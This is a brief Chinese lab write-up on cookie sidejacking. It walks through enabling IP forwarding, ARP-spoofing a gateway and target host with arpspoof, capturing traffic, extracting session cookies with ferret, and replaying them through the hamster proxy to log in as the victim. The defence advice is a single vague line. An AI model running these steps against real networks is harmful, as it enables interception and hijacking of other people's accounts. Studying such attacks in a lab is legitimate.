cookies劫持
一.实验基础
kali(zenmap,wireshark,hamster)
物理机
二.实验步骤
1.修改kali与物理机的网卡适配器,保证虚拟机中的kali系统能够和外部网络通信(若不可以关掉防火墙)
2.修改kali镜像源
#vim /etc/apt/sources.list
deb kali-rolling main
non-free contrib
deb-src kali-rolling
main non-free contrib
更新软件,下载软件
#dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386
3.Zenmap扫描存活的主机
4.收集用户的登录信息cookies
开启kali路由转发功能
#echo 1 > /proc/sys/net/ipv4/ip_forward
中间人攻击
#arpspoof -i eth0 -t 网关 目标主机
wireshark保存窃取的流量为 **.pacp 文件
在物理机上登录相对应的网站,尽量选择安全性较低的,登录要留存过程
处理流量,生成cookies文件hamster.text
#ferret -r **.pacp
5.启动hamster
#hamster
打开浏览器选项中设置 代理为127.0.0.1::1234
地址栏输入127.0.0.1:1234
hamster 找到目标IP,登录目标用户的网站
三.防御
尽量不要使用网站cookies
注:
1.只能有一个网络连接
2.抓包的时候,抓取的时间,尽量长
3.目标网站(选择不带s的,即http)
发布评论